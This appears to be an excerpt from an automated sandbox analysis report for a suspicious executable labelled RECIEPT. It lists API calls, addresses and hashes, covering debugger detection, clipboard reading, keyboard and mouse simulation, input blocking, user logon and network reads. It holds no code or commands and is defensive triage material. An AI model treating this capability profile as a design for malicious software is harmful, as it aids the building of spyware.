                                        • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                        • API String ID: 0-2872873767
                                        • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                        • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                        • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                        • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                        • __wsplitpath.LIBCMT ref: 00475644
                                          • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                        • _wcscat.LIBCMT ref: 00475657
                                        • __wcsicoll.LIBCMT ref: 0047567B
                                        • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                        • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                        • String ID:
                                        • API String ID: 2547909840-0
                                        • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                        • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                        • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                        • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                        APIs
                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                        • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                        • Sleep.KERNEL32(0000000A), ref: 0045250B
                                        • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                        • FindClose.KERNEL32(?), ref: 004525FF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                        • String ID: *.*$\VH
                                        • API String ID: 2786137511-2657498754
                                        • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                        • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                        • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                        • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                        APIs
                                        • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                        • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                        • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                        • String ID: pqI
                                        • API String ID: 2579439406-2459173057
                                        • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                        • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                        • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                        • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                        APIs
                                        • __wcsicoll.LIBCMT ref: 00433349
                                        • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                        • __wcsicoll.LIBCMT ref: 00433375
                                        • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: __wcsicollmouse_event
                                        • String ID: DOWN
                                        • API String ID: 1033544147-711622031
                                        • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                        • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                        • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                        • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                        APIs
                                        • GetKeyboardState.USER32(?), ref: 0044C3D2
                                        • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                        • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                        • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                        • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: KeyboardMessagePostState$InputSend
                                        • String ID:
                                        • API String ID: 3031425849-0
                                        • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                        • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                        • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                        • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                        APIs
                                          • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                        • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                        • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: ErrorLastinet_addrsocket
                                        • String ID:
                                        • API String ID: 4170576061-0
                                        • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                        • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                        • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                        • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                        APIs
                                          • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                        • IsWindowVisible.USER32 ref: 0047A368
                                        • IsWindowEnabled.USER32 ref: 0047A378
                                        • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                        • IsIconic.USER32 ref: 0047A393
                                        • IsZoomed.USER32 ref: 0047A3A1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                        • String ID:
                                        • API String ID: 292994002-0
                                        • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                        • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                        • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                        • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                        APIs
                                        • OpenClipboard.USER32(?), ref: 0046DCE7
                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                        • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                        • CloseClipboard.USER32 ref: 0046DD0D
                                        • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                        • CloseClipboard.USER32 ref: 0046DD41
                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                        • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                        • CloseClipboard.USER32 ref: 0046DD99
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                        • String ID:
                                        • API String ID: 15083398-0
                                        • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                        • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                        • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                        • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID: U$\
                                        • API String ID: 4104443479-100911408
                                        • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                        • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                        • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                        • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                        APIs
                                        • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Find$File$CloseFirstNext
                                        • String ID:
                                        • API String ID: 3541575487-0
                                        • Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                        • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                        • Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                        • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                        APIs
                                        • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                        • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                        • FindClose.KERNEL32(00000000), ref: 004339EB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: FileFind$AttributesCloseFirst
                                        • String ID:
                                        • API String ID: 48322524-0
                                        • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                        • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                        • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                        • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                        APIs
                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                        • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                          • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                        • String ID:
                                        • API String ID: 901099227-0
                                        • Opcode ID: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                        • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                        • Opcode Fuzzy Hash: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                        • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                        APIs
                                        • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Proc
                                        • String ID:
                                        • API String ID: 2346855178-0
                                        • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                        • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                        • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                        • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                        APIs
                                        • BlockInput.USER32(00000001), ref: 0045A38B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: BlockInput
                                        • String ID:
                                        • API String ID: 3456056419-0
                                        • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                        • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                        • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                        • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                        APIs
                                        • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: LogonUser
                                        • String ID:
                                        • API String ID: 1244722697-0
                                        • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                        • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                        • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                        • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                        APIs
                                        • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
